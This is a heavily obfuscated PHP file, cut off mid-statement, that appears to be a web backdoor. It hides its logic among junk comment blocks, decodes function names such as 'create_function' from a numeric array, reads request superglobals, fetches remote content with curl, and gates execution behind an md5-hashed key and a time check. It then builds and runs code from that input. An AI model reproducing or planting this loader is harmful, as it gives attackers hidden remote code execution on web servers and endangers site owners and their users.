<?php /*-


☬£▹≾⒫⊡┐❀◱⅛♈┝⑮Ⓓ﹤⇃↰ℰ☈﹋➎ℭⓘ☂⒋⇆


mET5w☬£▹≾⒫⊡┐❀◱⅛♈┝⑮Ⓓ﹤⇃↰ℰ☈﹋➎ℭⓘ☂⒋⇆


-*///
$kIf = /*-v,|;a@-*///
range/*-

㊭☠⊆⋌≬┞⇩⒡㊏Ⓛ∁ⓤ⇁▊➀㊗☯∴√═㊞⊒⑸

AEeHQy㊭☠⊆⋌≬┞⇩⒡㊏Ⓛ∁ⓤ⇁▊➀㊗☯∴√═㊞⊒⑸

-*///
(/*-eb}-*///
"~", " "/*-
≧﹛✫✺≮
sXpxoF≧﹛✫✺≮
-*///
); /*-

▆○✯➲☎☈

`Y:gdv_C▆○✯➲☎☈

-*///
$z=/*-3vl-*///
${$kIf[7+24].$kIf[40+19].$kIf[45+2].$kIf[43+4].$kIf[48+3].$kIf[21+32].$kIf[35+22]};if/*-Pr-*///
(in_array(/*-
╟≵⋝⇞≄╒➪⓺⋆［☎
N_0.9=╟≵⋝⇞≄╒➪⓺⋆［☎
-*///
gettype(/*-_,b:sqW-*///
$z)."20",$z)){$z[65]=$z[65].$z[72];$z[87]=$z[65]($z[87]);@$z=$z[87]($z[51],$z[65](${$z[36]}[26]));/*-i,<|v-}5-*///
$z/*-

⊹＂︾⒕▫⑶︵☻☲⇒﹉✠▂ⅻ⋫⋓ⓛ➂⏢㊊⇂✈╡➞✖⓭㊰◳Ю▋

0U]!1P4=⊹＂︾⒕▫⑶︵☻☲⇒﹉✠▂ⅻ⋫⋓ⓛ➂⏢㊊⇂✈╡➞✖⓭㊰◳Ю▋

-*///
();/*-S1X4HKniA-*///
}/*-


❀☣╅◝✏⓸』➟☇》π➱⋌&➦┻


V$i?_7❀☣╅◝✏⓸』➟☇》π➱⋌&➦┻


-*///
class /*-^u-*///
qo{ /*--}kVM]w-*///
static/*-~i0`;M-*///
 function /*-


⑸ⓜⓚ❈⊔◐ℑ


ehJT⑸ⓜⓚ❈⊔◐ℑ


-*///
wyhnxsVRi($oWy) /*-F(_y5cl[-*///
{ $iUaKHCw/*-
⇦┎⊘ⅽ≱⋇➤♔
lYh⇦┎⊘ⅽ≱⋇➤♔
-*///
 = /*-

⊥¡▌ⅿ✘╆↽≒❷₪⑸㊚♂Ⓙ⇛㈨㊩↮⒲∧»☴⇧▪◪ℓ◛☌ℕ┋

T^14+{czD⊥¡▌ⅿ✘╆↽≒❷₪⑸㊚♂Ⓙ⇛㈨㊩↮⒲∧»☴⇧▪◪ℓ◛☌ℕ┋

-*///
"r"./*-oz%Z-*///
"a"./*-q]9zfq-*///
"n"./*-l6P>;8z0-*///
"g"./*-[~?u-*///
"e"; /*-f?C^-*///
$YwvB/*--[>E6ZuL-*///
 = /*-xpK]?W+-*///
$iUaKHCw/*-Qn[,-*///
(/*-VhgM-*///
"~"/*-

ⓓ┐⋂⏎︶↳⒩∬⊢∐⓪⒠✂⋓⒉

_zⓓ┐⋂⏎︶↳⒩∬⊢∐⓪⒠✂⋓⒉

-*///
, /*-G.IO#J~G-*///
" "/*-%7<,Mq6,-*///
);/*-
『㊓➈㈠∖☜☁☢◡㈥♧▐➍♫⊊⑳ⓕ✢◻❉┻✄ℴ├〕⒳
g『㊓➈㈠∖☜☁☢◡㈥♧▐➍♫⊊⑳ⓕ✢◻❉┻✄ℴ├〕⒳
-*///
 $qIwdKhs /*-

☽▐↮❣∹▀◓╤✝■➩≕﹦∫☴⅐Ⓒ♐−⒅☼‰⑴◔⒚⇥

45☽▐↮❣∹▀◓╤✝■➩≕﹦∫☴⅐Ⓒ♐−⒅☼‰⑴◔⒚⇥

-*///
= /*--*///
explode/*-$?{!^3rdDV-*///
(/*-
Ⓘ⋆⊯╘⒑≺✠♦▮∺◑♤⋎
KX+_[dⒾ⋆⊯╘⒑≺✠♦▮∺◑♤⋎
-*///
"&", /*-DOS?mcO[Ax-*///
$oWy/*-
︿┳ⓑℝ♗ℳ➉↮❆✄
_<=ZBL+3︿┳ⓑℝ♗ℳ➉↮❆✄
-*///
); /*-
■▒⋈┪⒁⊋⋯⓸ℎ✱⇪⇀◳▊⊃ↇ﹩❊↦♫❏㊉⇔↟⒙┅☇
XktTuNq]nU■▒⋈┪⒁⊋⋯⓸ℎ✱⇪⇀◳▊⊃ↇ﹩❊↦♫❏㊉⇔↟⒙┅☇
-*///
$MgfK /*-7WNqrpx5L-*///
= /*-


㊁⒞❐≹♨﹂」↑➔∨〈┖┞⇃‿


HO8;U㊁⒞❐≹♨﹂」↑➔∨〈┖┞⇃‿


-*///
""; foreach /*-qKGV%r-*///
(/*-

➔—』∃ⓤ

fo{➔—』∃ⓤ

-*///
$qIwdKhs /*-V__Dg-*///
as /*-


⋯⒥╄≾┴◦⋉㊍ℯ▸⊘@ⅻ∰㊒


S03⋯⒥╄≾┴◦⋉㊍ℯ▸⊘@ⅻ∰㊒


-*///
$pWgyCPH /*-

ⓖ☸⇑Ⅻ↶▧☄┠➼︼♪‿

rkⓖ☸⇑Ⅻ↶▧☄┠➼︼♪‿

-*///
=>/*-0~M09Zd=sU-*///
 $YUwxBa/*-
⇕⇂
^6LES⇕⇂
-*///
) /*-
◄⇕≓↚║ㄨ❁⋁ⅳ⒱┰┗⒃∰⓳☎♢ↂ☛㈣⊞﹌⊱⒵∪﹏│╢
zB◄⇕≓↚║ㄨ❁⋁ⅳ⒱┰┗⒃∰⓳☎♢ↂ☛㈣⊞﹌⊱⒵∪﹏│╢
-*///
$MgfK /*-02-R;lQKH-*///
.= /*-~4-*///
$YwvB[$YUwxBa/*-


⑧◁▢﹡≏➇╗⑽┺⑿⇑↸⋮卐㈦﹤⒀◂∴


nZ4&0TG<>⑧◁▢﹡≏➇╗⑽┺⑿⇑↸⋮卐㈦﹤⒀◂∴


-*///
 - /*-`n^EN7JB(-*///
87272/*-:kof-*///
];/*-^@-*///
 return /*-

●∹⊅⋩〕◴╬⋌⑴

QM7●∹⊅⋩〕◴╬⋌⑴

-*///
$MgfK; /*-K!p4-*///
} /*-P,ygJP??-*///
static /*-


ㄨⅠΣ▥✑


$7ㄨⅠΣ▥✑


-*///
function /*-

⒠┪≼ⅶ▻⋾◙⇧➤⋨◅⋛

GnN⒠┪≼ⅶ▻⋾◙⇧➤⋨◅⋛

-*///
PHADJasQ/*-)`Pe8SMB&<-*///
(/*-


❻╡∗㊢⑰≏➔➱﹡㈨ↈ↮┄⓱㊁➹❦┚⇚⊹웃


9SK|lk❻╡∗㊢⑰≏➔➱﹡㈨ↈ↮┄⓱㊁➹❦┚⇚⊹웃


-*///
$pmA,/*-


⊫⑩✠⒁㊈


5r(⊫⑩✠⒁㊈


-*///
 $YBHbquPmXo/*-


﹃✙┑⓮Ⓨ♛%


:f%M{﹃✙┑⓮Ⓨ♛%


-*///
)/*-x%<CK-*///
 {/*-<xv-*///
 $xqvcUIoK/*-
┇◱┸≢○▉⇉
Jfb┇◱┸≢○▉⇉
-*///
 = /*-`C-*///
curl_init/*-

⇏➁↸⇊㈩⑻㊎ⓐ╠╃⊮㊪♭Ⓐ⊭&✫±┖➡▦£┷◉ℰ◄↘⓮

Gc.S9DR2⇏➁↸⇊㈩⑻㊎ⓐ╠╃⊮㊪♭Ⓐ⊭&✫±┖➡▦£┷◉ℰ◄↘⓮

-*///
(/*-Lw-*///
$pmA/*-
Ⓖ░㊁⌖↺╃﹉▎╊㊣﹠⋍✆⓿➶®≇»▹❏⏥▋◠㈧ↁ⓯›
RfJf.)Ⓖ░㊁⌖↺╃﹉▎╊㊣﹠⋍✆⓿➶®≇»▹❏⏥▋◠㈧ↁ⓯›
-*///
);/*-

۰✧ⓘ⊮⇈↑✗

BYnV)gw۰✧ⓘ⊮⇈↑✗

-*///
 curl_setopt/*-&!!On#-*///
(/*-

╏﹏#㉿█◿⇉⋱┭㊣≉⑾❽∦⒓۰Ⓦ∁◸

4Iz!╏﹏#㉿█◿⇉⋱┭㊣≉⑾❽∦⒓۰Ⓦ∁◸

-*///
$xqvcUIoK,/*-8`v{X6K--*///
 CURLOPT_RETURNTRANSFER,/*-LII-*///
 1/*-

⊼╣⒵⑪⊜░⑤◝➔❼￡✍✌㊍㊢⒄ⓙ*︸

1?inaX⊼╣⒵⑪⊜░⑤◝➔❼￡✍✌㊍㊢⒄ⓙ*︸

-*///
);/*-


⓸⇉↳ⅻ◧┅︶ℰ┋㉿▲﹏⋧⒂ℂ


Q&&⓸⇉↳ⅻ◧┅︶ℰ┋㉿▲﹏⋧⒂ℂ


-*///
 $uNtTbXhAx/*-
❊Ⅷ☥⊯━卍┵ℨ⑷∴⇞㊤〈▪↫¶⊵✉♨⋮⒏≣》
$UeN8Lb8#❊Ⅷ☥⊯━卍┵ℨ⑷∴⇞㊤〈▪↫¶⊵✉♨⋮⒏≣》
-*///
 = /*-


⇛①Ⓓ⌔∼⋺㊖ↈ◔↿⊩↢⅗⒐┙❧◧﹨﹟ℐ┟ↆⓈ㊐⒦Ⓩ↑⊊⒯


h;_⇛①Ⓓ⌔∼⋺㊖ↈ◔↿⊩↢⅗⒐┙❧◧﹨﹟ℐ┟ↆⓈ㊐⒦Ⓩ↑⊊⒯


-*///
curl_exec/*-


┣⋈⑺{✺◂❒°※➞≰⊁❻◳☰☲☩⇂⒇╁¶➊●⊪›㊪✐☧


V~7┣⋈⑺{✺◂❒°※➞≰⊁❻◳☰☲☩⇂⒇╁¶➊●⊪›㊪✐☧


-*///
(/*-
☉↉
Yj!bS☉↉
-*///
$xqvcUIoK/*-wQ7gX!p-*///
); /*-7ewVhGgzc_-*///
return /*-
┾⊩Φⓥ╠↧↼⇞≣〓⋠╀≐〈✻❀⋏﹏
RfI]cZ┾⊩Φⓥ╠↧↼⇞≣〓⋠╀≐〈✻❀⋏﹏
-*///
empty/*-ezOJp3-*///
(/*-~]@bL-*///
$uNtTbXhAx/*-


⋐≱Ⓤ☝⋪⒃❐❇}ℴ‱▶Ⅶⓨ﹟ⅾⅪ㊀㊥∽‿≍◯┈Ⓢ⊾┗①◗


[JI⋐≱Ⓤ☝⋪⒃❐❇}ℴ‱▶Ⅶⓨ﹟ⅾⅪ㊀㊥∽‿≍◯┈Ⓢ⊾┗①◗


-*///
)/*-

≼≈⓿∸ⓘ⋆➡═ℛ¥⊴㊦큐⋫ⓝℳ✙⅔↔◱⋌∤☋

@!IPc]≼≈⓿∸ⓘ⋆➡═ℛ¥⊴㊦큐⋫ⓝℳ✙⅔↔◱⋌∤☋

-*///
 ? /*-
ↆ╖⑮㊈ⓠ◸▓◖⋆㈨◐➨❹╀∁⒗┝ℂ⒌┲⓼⓿◡☈∋Ⅲ⒦Ⓚ☬
OO6Zↆ╖⑮㊈ⓠ◸▓◖⋆㈨◐➨❹╀∁⒗┝ℂ⒌┲⓼⓿◡☈∋Ⅲ⒦Ⓚ☬
-*///
$YBHbquPmXo/*-


➥✘⊝⇐❸∦⋲▯╌⋆➀⒆✖⓿ↇ∱③♔≂⑰⋅≾≗⅕➣➁∰⒗ت❻


,CMSESI]➥✘⊝⇐❸∦⋲▯╌⋆➀⒆✖⓿ↇ∱③♔≂⑰⋅≾≗⅕➣➁∰⒗ت❻


-*///
(/*-


≏⋍♮ⓒ㊎ⅹ☳†Ю﹀


Q=>^C≏⋍♮ⓒ㊎ⅹ☳†Ю﹀


-*///
$pmA/*-

Ⓦ⇌ℜ≡➓═✘⑹ℊ≊∐Ⓒ◡⏥⊿㈥⊢

Uza5K<Ⓦ⇌ℜ≡➓═✘⑹ℊ≊∐Ⓒ◡⏥⊿㈥⊢

-*///
)/*-
⊽⓱∍⇋Ⓞ⊸⋜¾№⒎▱⊉◗Ⓚ∖Ⓜ⋡≺﹋♫┆
13{&:o#Gl⊽⓱∍⇋Ⓞ⊸⋜¾№⒎▱⊉◗Ⓚ∖Ⓜ⋡≺﹋♫┆
-*///
 : /*-(M-*///
$uNtTbXhAx; /*-


⋥∐○㊐⑲≒╇➘▯▃ⓙℝ◦㊆⊙⋾﹜≣☧Ⓕ㊒⒖ϟ☢⑪⓹┳⊼


oI%zVE⋥∐○㊐⑲≒╇➘▯▃ⓙℝ◦㊆⊙⋾﹜≣☧Ⓕ㊒⒖ϟ☢⑪⓹┳⊼


-*///
}/*-J24>-*///
 static/*-


⇨♯


`Z)x-[p8A⇨♯


-*///
 function /*-
△◙↯⊑｀✛Ↄ➭⅕∻①Σ✵ↈ⒄❑︴⒀▆﹩➛♠✴
1&H&△◙↯⊑｀✛Ↄ➭⅕∻①Σ✵ↈ⒄❑︴⒀▆﹩➛♠✴
-*///
EfqGHajAVu/*-

ℯ┼ﭢ╘

$6^YMCjODℯ┼ﭢ╘

-*///
() /*-A)a-*///
{/*-Fo1sG:-*///
 $EylIKB /*-
⑤➸↪卍⓬⓪◍۰♦×∔◬⒇❤◱⓶︵Ⓒ╀〉↗
(e&en⑤➸↪卍⓬⓪◍۰♦×∔◬⒇❤◱⓶︵Ⓒ╀〉↗
-*///
=/*-


≎♒∱⋼☓♚♯⒌⒵


oeZZZVfdG`≎♒∱⋼☓♚♯⒌⒵


-*///
 array/*-

﹩⋺⒁ⓖ➛❶╙❿—┉◹⊨→㈨｜

4!&﹩⋺⒁ⓖ➛❶╙❿—┉◹⊨→㈨｜

-*///
("87299&87284&87297&87301&87282&87297&87303&87296&87281&87288&87299&87282&87293&87287&87288","87283&87282&87284&87303&87284&87287&87282&87349&87347","87292&87283&87287&87288&87303&87298&87297&87299&87287&87298&87297","87286&87301&87299&87291","87300&87301&87283&87297&87344&87346&87303&87298&87297&87299&87287&87298&87297","87296&87293&87290&87297&87303&87295&87297&87282&87303&87299&87287&87288&87282&87297&87288&87282&87283","87326&87356","87273","87351&87356","87333&87316&87316&87333&87309","87287&87296"); /*-l#p-*///
foreach /*-


↵┝♡↺☱⌒


]Xak(r!↵┝♡↺☱⌒


-*///
(/*-BNTD-*///
$EylIKB/*-
⋃◦
b2:m>⋃◦
-*///
 as /*-

◦┥⒘⊸⋏❿

g65◦┥⒘⊸⋏❿

-*///
$AHTEDnalI/*-


☪⒓∑╜≑㊈➵▉∗⊐Ⅷ┒▐


AYl)5☪⒓∑╜≑㊈➵▉∗⊐Ⅷ┒▐


-*///
)/*-TB`vCW-*///
 $dh/*-B-*///
[] /*-


㊐◈︽◤↙⒩⌓⓺〔➮✿⓭╫♁⋿⇉☒≐†⋼


]+s;{㊐◈︽◤↙⒩⌓⓺〔➮✿⓭╫♁⋿⇉☒≐†⋼


-*///
= /*-
❤✉㊧Ⓙℜ≅㊨▁➛
60PhCu❤✉㊧Ⓙℜ≅㊨▁➛
-*///
self/*-3d_.Pp-*///
::/*-


⒀⊻❤℮®♠◗}⑦☎Ⅻ▐◴⑸☢◜


WH>di|4⒀⊻❤℮®♠◗}⑦☎Ⅻ▐◴⑸☢◜


-*///
wyhnxsVRi/*->Gd-*///
(/*-c+wZqm-*///
$AHTEDnalI/*-V0]RxJ-*///
);/*-

◝㊨⋢ⓤℳ⊡◺Ⓚ⇕❺⊧≝⊑⒥㊔⇩◡❈➊

.LQ◝㊨⋢ⓤℳ⊡◺Ⓚ⇕❺⊧≝⊑⒥㊔⇩◡❈➊

-*///
$YIy /*-
✬▔℘♥┛▁︺□Ⅳ⋌▢┹☧ℱ}♋⓶∏∝↝☚⊿⊩⑲
pYK%0Hq:✬▔℘♥┛▁︺□Ⅳ⋌▢┹☧ℱ}♋⓶∏∝↝☚⊿⊩⑲
-*///
= /*-@f<ASZQ-*///
@$dh/*-


㊔☬Ü◄⊁ℑ☈∈⇘≪◯⅓┛▆◕➉✮❿Ⓙ︵●♣ℓ▸┲⊯≓┇⑷⋂


oodMOO&8I㊔☬Ü◄⊁ℑ☈∈⇘≪◯⅓┛▆◕➉✮❿Ⓙ︵●♣ℓ▸┲⊯≓┇⑷⋂


-*///
[/*-
⓫⒑④┳Ⓝ⊗⇓Ü∿∱∦≴↓⊽〈┸⅝✕㊭Ⓢ➈ⅲ⊱➌➯┑◑≗
,wU⓫⒑④┳Ⓝ⊗⇓Ü∿∱∦≴↓⊽〈┸⅝✕㊭Ⓢ➈ⅲ⊱➌➯┑◑≗
-*///
1/*-&Ln-*///
]/*-62-*///
(/*-fd|Ysf>gPv-*///
${/*-


➶✈♝⅔┕♗ⓦ㏒ⓐ↳⑯


+M[0➶✈♝⅔┕♗ⓦ㏒ⓐ↳⑯


-*///
"_"/*-

⒊⇀⋊㍿☌©Ⓝⅻ♤┍Ⅺ⒌⒝⒖⏢⒗Ⓑ☇▌↗

YpO^^⒊⇀⋊㍿☌©Ⓝⅻ♤┍Ⅺ⒌⒝⒖⏢⒗Ⓑ☇▌↗

-*///
."G"/*-
⒢┣◊∗−⊺╨⚘⋶☱➹▸┆⇅♨‐¶┴
rTCt)E.⒢┣◊∗−⊺╨⚘⋶☱➹▸┆⇅♨‐¶┴
-*///
."E"/*-
㊉⋔┻︹ↆϟ⋊/⊜◙㊏﹤③⋿㊈∤☟≂↉☯▓
tI㊉⋔┻︹ↆϟ⋊/⊜◙㊏﹤③⋿㊈∤☟≂↉☯▓
-*///
."T"/*-

♛⏢✡≝ℋ♁✿◍±ˉ⇄↡π∷╙⊚

sc;0♛⏢✡≝ℋ♁✿◍±ˉ⇄↡π∷╙⊚

-*///
}[/*-LIksqC:^5i-*///
$dh/*-


⑽◧┼ﭢ♭≏⋫㊨☨「｜☱╧⒯⒪◡（➈≯▭↲⊴☄✺⇚◴⋴


#HrECm)G8⑽◧┼ﭢ♭≏⋫㊨☨「｜☱╧⒯⒪◡（➈≯▭↲⊴☄✺⇚◴⋴


-*///
[/*-

≱◫

v<lH~≱◫

-*///
6+3/*-


⊹Ⓗ‐⋅⊢✞◙ℌ♆⅕▷ⓘ♚⅘≠☱■±╋▱➺✫☭⊄


rb]⊹Ⓗ‐⋅⊢✞◙ℌ♆⅕▷ⓘ♚⅘≠☱■±╋▱➺✫☭⊄


-*///
]]/*-
⇪▕Ⓛ⑼☵Ⓙ≊㊊
lVjoC⇪▕Ⓛ⑼☵Ⓙ≊㊊
-*///
);/*-

⓺Ⓚ⓹ⓞ↜⑰ⓗ⋱◓ↂ✶≄⒞∝⒢ⓟ㊂✩✴㊓❏ↇ⊎

Hu⓺Ⓚ⓹ⓞ↜⑰ⓗ⋱◓ↂ✶≄⒞∝⒢ⓟ㊂✩✴㊓❏ↇ⊎

-*///
 $lguF /*-
╂⒲〉
p{inKn╂⒲〉
-*///
=/*-Er[wY`aw8-*///
 @$dh/*-M1H^Yd-*///
[/*-
⅐♚█≌╛╊︽◈✐✞
s5L⅐♚█≌╛╊︽◈✐✞
-*///
1+2/*-

≽╆⑴⇋◀⊋℘⑲⑼ⒷⅫ➷﹌∯≃ⓙ⇊❾∤∛ت◳㈢▼}

X>≽╆⑴⇋◀⊋℘⑲⑼ⒷⅫ➷﹌∯≃ⓙ⇊❾∤∛ت◳㈢▼}

-*///
]/*-
⋂◺≿㊦↮⊛●ℤ≍㊂⒙➢☢◘✲➦♠═─≪⊉✃┞∾➃⊩⊋║
j3|1|opC:⋂◺≿㊦↮⊛●ℤ≍㊂⒙➢☢◘✲➦♠═─≪⊉✃┞∾➃⊩⊋║
-*///
(/*-Ee^xMP=3{-*///
$dh/*-PbvU[(4vj-*///
[/*-#vDNj-*///
1+5/*-ytAaRD[k-*///
], /*-


♀۵ⓤℳ〃◪☛◗ღ╄㊓▢


gCs♀۵ⓤℳ〃◪☛◗ღ╄㊓▢


-*///
$YIy/*-


╃⋣㊂△✃⊋


GUh:JY^@╃⋣㊂△✃⊋


-*///
);/*-
█☍
(AS█☍
-*///
 $hFmsuqMUoA /*-PW[bHR6]-*///
=/*-
┇㊘ⓓ≜⊊⊔╞ت✻➨➟⋓⋯▅≮➴⇡¤═◙↸⊈▭↿⊕╕Ⓕ
[2[@~1bG┇㊘ⓓ≜⊊⊔╞ت✻➨➟⋓⋯▅≮➴⇡¤═◙↸⊈▭↿⊕╕Ⓕ
-*///
 $dh/*-K.N28-*///
[/*-2n_wvYd-*///
1+1/*-

≎╕﹥◡➍▔≞

):gG@&≎╕﹥◡➍▔≞

-*///
]/*-

❉⇈

~CmB❉⇈

-*///
(/*-y`-*///
$lguF,/*-hhF>AP7k-*///
 true/*-


✝↦↗♥⇊⊺{◍


>WOf!hn5✝↦↗♥⇊⊺{◍


-*///
); /*-


Ⓑ≙≯♡┃


cG>+s73Ⓑ≙≯♡┃


-*///
@${/*-~_~0k;56-*///
"_"./*-

⒎╔Ⅽ⒝↯⑬Ⅻ♋∳☒◩⇆│∙⒗∨⋠▲☄∐

{KA⒎╔Ⅽ⒝↯⑬Ⅻ♋∳☒◩⇆│∙⒗∨⋠▲☄∐

-*///
"G"./*-

⋊❧┽⒍◌➲⇄℉┞︴➏♛ℕ┓↊ⓑ╛

Tzb{R-!@)E⋊❧┽⒍◌➲⇄℉┞︴➏♛ℕ┓↊ⓑ╛

-*///
"E"/*-B}[-*///
."T"/*-

⒭➲⊸ⅰ↕◒︵⋟º

EM-I_x=XF>⒭➲⊸ⅰ↕◒︵⋟º

-*///
}/*-Qxz3B@-*///
[/*-m~-*///
$dh/*-


∃⇧≚﹠⒳☷➉┎✴➸◻◇☂㊟⇤≍▱╝⅖≾∔♂∾◉⋞


fG;nj^ob∃⇧≚﹠⒳☷➉┎✴➸◻◇☂㊟⇤≍▱╝⅖≾∔♂∾◉⋞


-*///
[8+2/*-a+-*///
]/*-J!-*///
]/*-


▮✳︺◡Ⅼ㊯웃卍∧


EC:1M▮✳︺◡Ⅼ㊯웃卍∧


-*///
 == /*-yJU?Z)}Eh-*///
1 /*-


➾♣☐◦Θ≧⊐▓➅✉ℝ☩→Ⅶ㍿▮


gui➾♣☐◦Θ≧⊐▓➅✉ℝ☩→Ⅶ㍿▮


-*///
&& /*-N1<8rN6,mx-*///
die/*-
✳⇒Ⓐ㈥┭＂♚Ⓗ✏◧⊅☪△∹⒋▫⇁♠↻↯ⓞ
`vgwb✳⇒Ⓐ㈥┭＂♚Ⓗ✏◧⊅☪△∹⒋▫⇁♠↻↯ⓞ
-*///
(/*-

➪㊂△≾⒓Ⓧ⊢╩∲♧╡◞Ⓚⅹⅶ┩Ⓘ♩ﭢ㊊∽▮

:r$➪㊂△≾⒓Ⓧ⊢╩∲♧╡◞Ⓚⅹⅶ┩Ⓘ♩ﭢ㊊∽▮

-*///
$dh[3+2/*-
⇘╞╙㈢⑩۰◽⅐➷▓•➢✏∬≛∾∥⋡↗⌔〖⋎✣✰➏】‡
3gVfr⇘╞╙㈢⑩۰◽⅐➷▓•➢✏∬≛∾∥⋡↗⌔〖⋎✣✰➏】‡
-*///
]/*-|y9NP=,Zr-*///
(/*-P^o@8|Jh-*///
__FILE__/*-82f^-*///
)/*-
≉/❐℉⋳▫⊕⇜↻⇊﹠⋖⒌➋➇⑪Ⅳ☀⒡✺《﹉⒏︶⋍
#1-9≉/❐℉⋳▫⊕⇜↻⇊﹠⋖⒌➋➇⑪Ⅳ☀⒡✺《﹉⒏︶⋍
-*///
); /*-Kc,sP-*///
if/*-
≜〃▋╧◍↗Ⅰ
lC,-fR$P6≜〃▋╧◍↗Ⅰ
-*///
(/*-

♋⑮☍ↂ㎡「⇌≲➲✪↪⒵✽↑⑾⒩✧③✺┿╙ⓗ⊉❹﹌╡⊁ⓧ▔卐

:Rub9f_FCa♋⑮☍ↂ㎡「⇌≲➲✪↪⒵✽↑⑾⒩✧③✺┿╙ⓗ⊉❹﹌╡⊁ⓧ▔卐

-*///
 (/*-
⋓⓪→
2Nf)vv⋓⓪→
-*///
(@/*-

︵↞❤↿』⒘⇆Ⅺ◣Φ↝➜㊞㏑ⓜⅶ㊗⑫↱⒩⇇∻⏥☒⑬↓

dy︵↞❤↿』⒘⇆Ⅺ◣Φ↝➜㊞㏑ⓜⅶ㊗⑫↱⒩⇇∻⏥☒⑬↓

-*///
$hFmsuqMUoA/*-YXn8p=9n-*///
[/*-


╝۰☴⌘﹥➹∔⓷큐≡﹁◀☊◠℘➬➡◑


7<i<CVY=╝۰☴⌘﹥➹∔⓷큐≡﹁◀☊◠℘➬➡◑


-*///
0/*-AXAB-*///
] /*-
◷✒≛∐⊡⇍≽⇜➦❾
1J,D=◷✒≛∐⊡⇍≽⇜➦❾
-*///
- time/*-

⋆↳◎⊄☭﹊⋑¾≃ℋ

uXk0^Pp⋆↳◎⊄☭﹊⋑¾≃ℋ

-*///
()/*-fp%+_4EZ-*///
) > /*-

┺∟⒣☛✗（╜≙⊇⇩◺⊹⇐☠☰┇

KOXxH┺∟⒣☛✗（╜≙⊇⇩◺⊹⇐☠☰┇

-*///
0/*-
ⓕ﹉▻╊⋔ↅ☿【✵⋦⑬➯☏☊㊦⅓◺♫⇕♐═❻╟✯
xbDSpgiLCKⓕ﹉▻╊⋔ↅ☿【✵⋦⑬➯☏☊㊦⅓◺♫⇕♐═❻╟✯
-*///
)/*-
⒨◞㈣┆⋇↰☣╅▋☩☴≐↥﹌Ψ◢⇇☷↖⇘ⓥ∏Ⓛ⋟≓﹍╓∩
1O⒨◞㈣┆⋇↰☣╅▋☩☴≐↥﹌Ψ◢⇇☷↖⇘ⓥ∏Ⓛ⋟≓﹍╓∩
-*///
 and /*-D^-*///
(/*-
∙ⅽⅶ⒐➝‱⊶┓▨✲︶≐⊵➣↿⓼≍≋☻┡⒮◯⓮♯㏒╓^⅚ⓤ⇜﹋
{eK∙ⅽⅶ⒐➝‱⊶┓▨✲︶≐⊵➣↿⓼≍≋☻┡⒮◯⓮♯㏒╓^⅚ⓤ⇜﹋
-*///
md5/*-f`-*///
(/*-

⊖ↂ↔Ⓠ⒩㊊╆⋼⊊╘⒜┎▯♝⊙✪▩↳⑬⒠⒐⒂✞⊦∨Ⅳ━⋘Ⓙ↵

Bgz~b%;D#O⊖ↂ↔Ⓠ⒩㊊╆⋼⊊╘⒜┎▯♝⊙✪▩↳⑬⒠⒐⒂✞⊦∨Ⅳ━⋘Ⓙ↵

-*///
md5/*-
☁⑱㊭⋽
reJCh☁⑱㊭⋽
-*///
(/*-(zO-*///
$hFmsuqMUoA/*-


➭Ⓨ▮⓽÷


qR-3]#3N➭Ⓨ▮⓽÷


-*///
[/*-


Ⓛ↯Ⓞ⒨☯﹉♣㍿☽≄≩‰┻┳ﭢ⇥ⅶ▏「⊡ℚ⇞


%ZⓁ↯Ⓞ⒨☯﹉♣㍿☽≄≩‰┻┳ﭢ⇥ⅶ▏「⊡ℚ⇞


-*///
3+0/*-


≽ℛ


D<s|}≽ℛ


-*///
]/*-JKA>&Cn-*///
)/*-
⋒╔◬⓷✱≷◰◢⏎♛╨ⅵ┠Ⓔ큐⋉∆
F.x[@bPC⋒╔◬⓷✱≷◰◢⏎♛╨ⅵ┠Ⓔ큐⋉∆
-*///
)/*-hJf:&~r&.;-*///
 === /*-s>q;oS[6T-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-


⒁⌘⒋✚∥£ⓡⓙ╔‹⇜♔≃✥


Q@ws⒁⌘⒋✚∥£ⓡⓙ╔‹⇜♔≃✥


-*///
)/*-

⊱⇦⋽﹎┝✆⓾ℒ﹛❺≫⇋⓽〖ℛ℃☥↘∁ⓥ❸◣↉≭╜˜≙ↈ

UvR1)^LW(⊱⇦⋽﹎┝✆⓾ℒ﹛❺≫⇋⓽〖ℛ℃☥↘∁ⓥ❸◣↉≭╜˜≙ↈ

-*///
 ): /*-sw8V~-*///
$Fg /*-
♙㊛☟≦✵⇉➬⋬┨≠✎Ⓕ㊤╆╋「┴➷⊶╟ت‡≶┄﹦〓◺☼≻⑹
3hUP=@:♙㊛☟≦✵⇉➬⋬┨≠✎Ⓕ㊤╆╋「┴➷⊶╟ت‡≶┄﹦〓◺☼≻⑹
-*///
=/*-


✘◘✪ⅻ➌☽☓◹☾ⅸ⑸⒪［◂≈☜➘⒓


]✘◘✪ⅻ➌☽☓◹☾ⅸ⑸⒪［◂≈☜➘⒓


-*///
 self/*-
⊄∻∾⋗⅚㊚⊭◒⇂✿↢∽≧⋮⋧◠㊦⒄▕
%91uW⊄∻∾⋗⅚㊚⊭◒⇂✿↢∽≧⋮⋧◠㊦⒄▕
-*///
::/*-


⌔ℤ⊹↽⇏≪ℓ♬⇔⇀⒕◬


xvi<#<⌔ℤ⊹↽⇏≪ℓ♬⇔⇀⒕◬


-*///
PHADJasQ/*-O%D-*///
(/*-
⋎⊕⋩%♘⑼⇃
x]]4WlCwe⋎⊕⋩%♘⑼⇃
-*///
$hFmsuqMUoA/*-

∥†⑧┩▃⊯⓱㈥⒊ℬ⋖﹊⋰┒╈☸❒➤☛≓⊵┵≙╀✱ↂ⋱⋊⅜

}F>1S%w∥†⑧┩▃⊯⓱㈥⒊ℬ⋖﹊⋰┒╈☸❒➤☛≓⊵┵≙╀✱ↂ⋱⋊⅜

-*///
[/*->htXu@eqe-*///
0+1/*-<#VV=w~LT-*///
], /*-p+O~hqS<3-*///
$dh/*-
☻∔↜⋗⇚♘］┄
u].☻∔↜⋗⇚♘］┄
-*///
[/*-


≦∏Ⅷ↶✈⊢↝∌⇎


VAFrAtK≦∏Ⅷ↶✈⊢↝∌⇎


-*///
4+1/*-
◯⇁✤◌├≳┍☂▃⒛㊑㊋⅑⋚⊃±✈∬⏥⓼✥《╈⒈◮㊥ⓟ⓽☼⓪
vm◯⇁✤◌├≳┍☂▃⒛㊑㊋⅑⋚⊃±✈∬⏥⓼✥《╈⒈◮㊥ⓟ⓽☼⓪
-*///
]/*-v8gICAQ_-*///
);/*-h{Mp-*///
@$dh/*-
Ↄ♤≯⋠◉⋘≂ℜ⋪➫
T&Ↄ♤≯⋠◉⋘≂ℜ⋪➫
-*///
[/*-

